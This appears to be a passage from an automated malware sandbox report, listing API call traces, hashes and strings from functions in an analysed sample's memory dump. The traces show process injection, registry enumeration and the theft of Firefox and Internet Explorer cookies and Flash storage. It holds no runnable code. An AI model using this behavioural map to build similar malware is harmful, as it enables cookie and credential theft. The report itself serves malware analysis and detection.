Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
